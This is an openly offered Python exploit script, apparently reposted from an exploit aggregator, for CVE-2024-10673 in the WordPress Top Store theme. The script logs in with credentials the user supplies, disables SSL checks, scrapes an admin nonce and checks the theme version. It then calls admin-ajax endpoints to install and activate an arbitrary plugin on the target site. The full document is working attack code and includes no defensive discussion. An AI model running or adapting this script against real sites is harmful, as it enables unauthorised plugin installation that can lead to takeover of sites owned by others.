Share
## https://sploitus.com/exploit?id=1337DAY-ID-39946
import requests
import argparse
import re
import json
# By Nxploit | Khaled Alenazi
def disable_ssl_verification():
requests.packages.urllib3.disable_warnings()
session.verify = False # Ignore SSL verification
def login(url, username, password):
login_url = f"{url}/wp-login.php"
login_data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In"
}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
response = session.post(login_url, data=login_data, headers=headers, allow_redirects=True)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
return {"status": "success", "message": "Logged in successfully"}
else:
return {"status": "error", "message": "Login failed. Check credentials."}
def fetch_nonce(url):
nonce_page_url = f"{url}/wp-admin/themes.php?page=thunk_started"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
nonce_response = session.get(nonce_page_url, headers=headers)
nonce_match = re.search(r'var _wpUpdatesSettings = {"ajax_nonce":"(.*?)"};', nonce_response.text)
if nonce_match:
return {"status": "success", "message": "Nonce extracted", "nonce": nonce_match.group(1)}
else:
return {"status": "error", "message": "Failed to extract nonce"}
def check_plugin_version(url):
readme_url = f"{url}/wp-content/themes/top-store/readme.txt"
response = session.get(readme_url)
if response.status_code == 200:
version_match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
if version_match:
version = version_match.group(1)
if version <= "1.5.4": # Compare with the vulnerable version
return {"status": "success", "message": f"Vulnerable version detected: {version}"}
else:
return {"status": "info", "message": f"Non-vulnerable version detected: {version}"}
else:
return {"status": "error", "message": "Version information not found in readme.txt"}
else:
return {"status": "error", "message": f"Failed to fetch readme.txt, status code: {response.status_code}"}
def install_plugin(url, plugin_slug, nonce):
admin_ajax_url = f"{url}/wp-admin/admin-ajax.php"
plugin_init = f"{plugin_slug}/{plugin_slug}.php"
install_data = {
"action": "install-plugin",
"slug": plugin_slug,
"init": plugin_init,
"_ajax_nonce": nonce,
"_fs_nonce": "",
"username": "",
"password": "",
"connection_type": "",
"public_key": "",
"private_key": ""
}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
install_response = session.post(admin_ajax_url, data=install_data, headers=headers)
if '"success":true' in install_response.text:
return {"status": "success", "message": f"Plugin {plugin_slug} installed successfully"}
else:
return {"status": "error", "message": "Plugin installation failed", "response": install_response.text}
def activate_plugin(url, plugin_slug):
admin_ajax_url = f"{url}/wp-admin/admin-ajax.php"
plugin_init = f"{plugin_slug}/{plugin_slug}.php"
activate_data = {
"action": "th_activeplugin",
"slug": plugin_slug,
"init": plugin_init
}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest"
}
activate_response = session.post(admin_ajax_url, data=activate_data, headers=headers)
if '"success":true' in activate_response.text:
return {"status": "success", "message": f"Plugin {plugin_slug} activated successfully"}
else:
return {"status": "error", "message": "Plugin activation failed", "response": activate_response.text}
def main():
parser = argparse.ArgumentParser(description="Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi ")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
parser.add_argument("-un", "--username", required=True, help="WordPress Username")
parser.add_argument("-p", "--password", required=True, help="WordPress Password")
parser.add_argument("-pl", "--plugin", default="hunk-companion", help="Plugin slug to install and activate (default: hunk-companion)")
args = parser.parse_args()
disable_ssl_verification()
login_result = login(args.url, args.username, args.password)
print(json.dumps(login_result))
if login_result["status"] != "success":
return
nonce_result = fetch_nonce(args.url)
print(json.dumps(nonce_result))
if nonce_result["status"] != "success":
return
version_result = check_plugin_version(args.url)
print(json.dumps(version_result))
if version_result["status"] != "success":
return
install_result = install_plugin(args.url, args.plugin, nonce_result["nonce"])
print(json.dumps(install_result))
if install_result["status"] != "success":
return
activate_result = activate_plugin(args.url, args.plugin)
print(json.dumps(activate_result))
if activate_result["status"] != "success":
return
print(json.dumps({"status": "success", "message": "Exploit completed successfully!"}))
if __name__ == "__main__":
session = requests.Session()
main()